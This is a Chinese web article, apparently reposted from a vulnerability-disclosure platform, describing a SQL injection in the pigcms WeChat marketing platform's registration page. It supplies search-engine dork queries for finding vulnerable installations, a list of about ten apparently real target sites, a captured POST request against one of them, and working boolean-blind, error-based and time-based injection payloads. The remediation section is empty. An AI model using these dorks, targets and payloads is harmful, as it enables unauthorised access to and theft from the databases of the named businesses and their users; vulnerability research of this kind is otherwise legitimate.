当前位置:站易网首页 > 建站教程 > 网站运营 > 源码调试 > pigcms微信公众营销平台通用SQL注入漏洞

pigcms微信公众营销平台通用SQL注入漏洞

文章TAG:
时间:2016-01-07来源:未知 作者:admin 文章热度:

漏洞详情

披露状态:

 

2015-03-10: 积极联系厂商并且等待厂商认领中,细节不对外公开
2015-04-30: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

某微信公众营销平台通用SQL注入漏洞

详细说明:

见乌云: WooYun: 某通用型微信公众平台SQL注入(泄露上万商家信息) 属于捡漏一处!

关键词:inurl:index.php?g=Home&m=Index&a=help



intitle:营销系统 inurl:login

漏洞位置:index.php?m=Index&a=reg(注册页面)
 

1.png


 

1.png


 

漏洞证明:

借用前人案例:



http://a.t2.weixinbiz.cn/

http://www.weixint.com/

http://wechat.dahailuo.com/

http://www.hohoxj.com/

http://guphoto.xf.sc.cn/

http://www.jpsbzr.com/

http://weixin.kfqd.cn/

http://www.iweichat.com/

http://wechat.dahailuo.com/

http://www.macheka.cn/

http://liemei.cedb.com/

这里以http://a.t2.weixinbiz.cn/index.php?m=Index&a=reg为例:

测试数据,截取数据包:
 

code 区域
POST /index.php?m=Users&a=checkreg HTTP/1.1

Host: a.t2.weixinbiz.cn

Proxy-Connection: keep-alive

Content-Length: 151

Cache-Control: max-age=0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8

Origin: http://a.t2.weixinbiz.cn

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.99 Safari/537.36

Content-Type: application/x-www-form-urlencoded

Referer: http://a.t2.weixinbiz.cn/index.php?m=Index&a=reg

Accept-Encoding: gzip, deflate

Accept-Language: zh-CN,zh;q=0.8

Cookie: CNZZDATA5524076=cnzz_eid%3D2057590716-1425359086-http%253A%252F%252Fa.t2.weixinbiz.cn%252F%26ntime%3D1425359086; PHPSESSID=97d8b8f0cfa07313d01299087bc5760f; AJSTAT_ok_pages=2; AJSTAT_ok_times=2





username=admin%27&password=123456&repassword=123456&email=212312313%40qq.com&__hash__=563e40fffca54ef4dd9ac35d6c2af1b5_ba74dd678a656f8ee0b8e7223ce58417

Place: POST

Parameter: username

    Type: boolean-based blind

    Title: MySQL boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY claus

e (RLIKE)

    Payload: username=admin') RLIKE IF(8823=8823,0x61646d696e,0x28) AND ('WwRy'=

'WwRy&password=123456&repassword=123456&email=4545644@qq.com&__hash__=563e40fffc

a54ef4dd9ac35d6c2af1b5_28360a5eeac616e09430aee305e702d9





    Type: error-based

    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause

    Payload: username=admin') AND (SELECT 8242 FROM(SELECT COUNT(*),CONCAT(0x3a7

976633a,(SELECT (CASE WHEN (8242=8242) THEN 1 ELSE 0 END)),0x3a78716d3a,FLOOR(RA

ND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND ('yWZv'='yWZ

v&password=123456&repassword=123456&email=4545644@qq.com&__hash__=563e40fffca54e

f4dd9ac35d6c2af1b5_28360a5eeac616e09430aee305e702d9





    Type: AND/OR time-based blind

    Title: MySQL > 5.0.11 AND time-based blind

    Payload: username=admin') AND SLEEP(5) AND ('afwa'='afwa&password=123456&rep

assword=123456&email=4545644@qq.com&__hash__=563e40fffca54ef4dd9ac35d6c2af1b5_28

360a5eeac616e09430aee305e702d9


 

1.png



数据库信息:
 

1.png



其他如上!

修复方案:

如上


    上一篇:没有了
    下一篇:Pigcms充值漏洞
    相关源码调试